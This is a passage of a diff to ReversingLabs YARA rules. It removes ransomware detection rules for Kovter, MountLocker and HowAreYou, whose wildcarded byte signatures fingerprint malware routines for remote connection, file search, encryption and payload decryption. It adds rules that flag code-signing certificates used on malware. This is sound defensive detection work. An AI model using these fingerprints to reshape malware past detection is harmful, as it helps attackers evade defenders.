 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Kovter"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D
-            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
-            89 5D ?? 89 5D ?? 8B D9 89 55 ?? 89 45 ?? 8B 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 A1 ?? ?? ?? ?? 80 38 ?? 74
-            ?? 8B CE 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 33 C0
-            89 45 ?? 33 C0 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 75 ?? B3 ?? 8D 45 ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ??
-            ?? ?? ?? 5A 2B C2 83 C0 ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 83 C2 ??
-            8B 45 ?? 59 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 50 8D
-            85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ??
-            8B D0 42 8B 45 ?? 59 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 8B C8 49 BA ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 48 0F 8E ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ??
-            ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68
-            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D
-        }
-		$remote_connection_2 = {
-            45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 0D ?? ??
-            ?? ?? 0D ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A
-            ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45
-            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ??
-            ?? ?? ?? 8B C6 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ??
-            83 7D ?? ?? 75 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF
-            0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D
-            45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45
-            ?? 0D ?? ?? ?? ?? 0D ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50
-            E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ??
-            ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 ?? E8 ?? ?? ?? ?? 8B
-            45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 48 0F 8E ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8
-            85 FF 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ??
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B
-        }
-		$remote_connection_3 = {
-            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ??
-            ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 ??
-            E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ??
-            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45
-            ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ??
-            ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ??
-            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$find_files = {
-            50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 33 F6 46 81 FE ?? ?? ?? ?? 0F 87
-            ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 8D 57 ?? B9 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 07 ?? 0F 85 ?? ?? ?? ?? F6 47 ?? ?? 0F 85 ?? ??
-            ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 ??
-            6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75
-            ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 0F 85 ?? ?? ?? ?? 83
-            FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ??
-            ?? ?? 33 F6 46 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45
-            ?? 8D 57 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F
-            84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 07 ?? 0F
-            84 ?? ?? ?? ?? F6 47 ?? ?? 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 75
-            ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 75
-            ?? 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 68
-            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? F7 D8 1B C0
-            F7 D8 84 C0 0F 85 ?? ?? ?? ?? 83 FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B DB F7 DB 84 DB
-            75 ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$decrypt_payload_script = {
-            FF 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF
-            75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75
-            ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
-            ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 8B C3 BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? FF 33 FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF
-            75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF
-            75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D
-            45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_files and $decrypt_payload_script and ( all of ( $remote_connection_* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lossera-M, OOO" and ( pe.signatures [ i ] . serial == "00:87:6c:00:bd:66:5d:f9:8b:35:55:4f:67:a5:c1:c3:2a" or pe.signatures [ i ] . serial == "87:6c:00:bd:66:5d:f9:8b:35:55:4f:67:a5:c1:c3:2a" ) and 1493078400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Mountlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4B093Cb60D4B992266F550934A4Ac7D0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects MountLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8ce7e5c4-9eca-5dd2-ab92-39b915900d72"
-		date = "2021-03-25"
-		modified = "2021-03-25"
+		id = "c459c3ac-205c-5c13-959d-c6b40f81222f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.MountLocker.yara#L1-L86"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13368-L13384"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d203217c229d54802e96e19dc66d38ecb0443d19e0492efe337df471a99559dc"
+		logic_hash = "4b634bc706638d72f2d036d41cf092cac538e930d7d407eebc225b482fd64f51"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "MountLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 8B 3D ?? ?? ?? ?? 8B DA 8B F1 FF D7 89 44 24 ??
-            33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 56 89 54 24 ?? 89 44 24 ?? FF 15
-            ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 50 FF 15 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF 74 24 ?? 6A ?? 6A ?? FF 74 24 ?? FF
-            15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C9 0F 31 89 44 8C ?? 41 83 F9
-            ?? 72 ?? FF 75 ?? 8B D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 59 85 C0 74 ?? 8D 4C
-            24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 8B 7C 24 ?? 8B 44 24 ?? 89 7C 24 ?? 89 44 24 ?? 8B
-            35 ?? ?? ?? ?? 8B DE 8B 15 ?? ?? ?? ?? 03 DF 8B CA 89 54 24 ?? 13 C8 BF ?? ?? ?? ??
-            8B C6 F0 0F C7 0F 8B 7C 24 ?? 3B C6 8B 44 24 ?? 75 ?? 3B 54 24 ?? 75 ?? FF 74 24 ??
-            8B 35 ?? ?? ?? ?? FF D6 FF 74 24 ?? FF D6 8B 3D ?? ?? ?? ?? FF D7 8B F8 8B C2 2B 7C
-            24 ?? 89 7C 24 ?? 1B 44 24 ?? 89 44 24 ?? 75 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 35 ?? ??
-            ?? ?? 8B DE 8B 15 ?? ?? ?? ?? 03 DF 8B CA 89 54 24 ?? 13 C8 BF ?? ?? ?? ?? 8B C6 F0
-            0F C7 0F 8B 7C 24 ?? 3B C6 8B 44 24 ?? 75 ?? 3B 54 24 ?? 75 ?? 50 57 FF 74 24 ?? FF
-            74 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 8B C2 81 E2 ?? ?? ?? ?? 25 ?? ?? ?? ?? 89 54 24
-            ?? DF 6C 24 ?? 83 64 24 ?? ?? 89 44 24 ?? DF 6C 24 ?? D9 E0 DE C1 D9 5C 24 ?? D9 44
-            24 ?? D9 05 ?? ?? ?? ?? D8 D9 DF E0 F6 C4 ?? 7A ?? D9 1D ?? ?? ?? ?? EB ?? DD D8 8B
-            44 24 ?? EB ?? 8B 44 24 ?? 85 C0 8B 35 ?? ?? ?? ?? 74 ?? 50 FF D6 FF 74 24 ?? FF D6
-            33 C0 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_p2 = {
-            55 8B EC 83 EC ?? 53 56 57 33 FF 6A ?? 8B F7 5B 0F 31 6A ?? 89 86 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 83 C6 ?? 3B F3 72 ?? 8B D3 B9 ?? ?? ?? ?? 8A 01 88 41 ?? 41 83 EA ?? 75
-            ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 57 8D 45 ?? 89 5D ?? 50 89 7D ?? 89 7D ?? FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 57 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ??
-            ?? ?? 57 6A ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? 8B F0 FF 15 ?? ?? ?? ?? 57 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 F6 74 ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 33 C0 40
-            EB ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E
-            5B 8B E5 5D C3
-        }
-		$find_files_p1 = {
-            53 55 56 8B 74 24 ?? 8B EA 57 8B F9 6A ?? 83 26 ?? 58 66 89 44 6F ?? 8D 5F ?? 33 C0
-            66 89 44 6F ?? 8D 87 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 53 89 44 24 ?? FF D0 33 C9 66 89
-            4C 6F ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 39 4F ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
-            F8 ?? 0F 85 ?? ?? ?? ?? 8D 46 ?? 50 6A ?? 8D 4E ?? 51 8D 56 ?? 52 8D 46 ?? 50 6A ??
-            6A ?? 8D 5F ?? 53 FF 15 ?? ?? ?? ?? F7 D8 1B C0 83 C0 ?? 89 06 74 ?? 8B CB E8 ?? ??
-            ?? ?? 85 C0 74 ?? 6A ?? 58 66 89 44 6F ?? 33 C0 66 89 44 6F ?? 8D 87 ?? ?? ?? ?? 50
-            53 FF 54 24 ?? 33 C9 66 89 4C 6F ?? 83 F8 ?? 75 ?? 39 0E 74 ?? 51 FF 76 ?? FF 76 ??
-            FF 76 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 3E ?? 74 ?? FF 76 ?? FF 15 ?? ?? ?? ??
-            83 26 ?? 83 C8 ?? 5F 5E 5D 5B C3
-        }
-		$find_files_p2 = {
-            55 8B EC 83 E4 ?? 83 EC ?? 53 55 56 8B F1 57 FF 46 ?? 8D 7E ?? 8B 07 8D 5E ?? 89 44
-            24 ?? 8B 46 ?? 53 89 07 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 51 8B D0 8B CE E8
-            ?? ?? ?? ?? 8B E8 59 83 FD ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 8D 86 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 8D 9E ?? ?? ?? ?? F6 03 ?? 74 ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB
-            ?? 8D 86 ?? ?? ?? ?? 50 8B 44 24 ?? 05 ?? ?? ?? ?? 8D 04 46 50 FF 15 ?? ?? ?? ?? FF
-            76 ?? 57 6A ?? FF 16 83 C4 ?? 85 C0 74 ?? 53 55 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 55 FF
-            15 ?? ?? ?? ?? 83 7E ?? ?? 8D 5E ?? 74 ?? 83 7C 24 ?? ?? 74 ?? 6A ?? FF 74 24 ?? FF
-            74 24 ?? FF 74 24 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? FF 74 24
-            ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 C0 89 0F 40 5F 5E 5D 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LCB SISTEMAS LTDA ME" and pe.signatures [ i ] . serial == "4b:09:3c:b6:0d:4b:99:22:66:f5:50:93:4a:4a:c7:d0" and 1478649600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Howareyou : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2050B54146B011Ed30F60F61 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects HowAreYou ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "998fbebe-099d-5779-ad4a-91b7b6c8ad6b"
-		date = "2021-06-14"
-		modified = "2021-06-14"
+		id = "0db2d42d-bdc3-50bc-b360-a39ccec4df41"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.HowAreYou.yara#L1-L205"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13386-L13402"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "90568365aac61d120886f9efa9822ccc23df79a1a55e522c81db6e77477c4f04"
+		logic_hash = "74749317fcefcdb698046a6f42c6c6e05cc1eab1370b3b1fd7d025f49de4a032"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HowAreYou"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 05 ??
-            ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 0D ?? ??
-            ?? ?? 89 08 8B 05 ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ??
-            8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 85 C9 74 ?? 74 ?? 8B 49
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8D 44 24
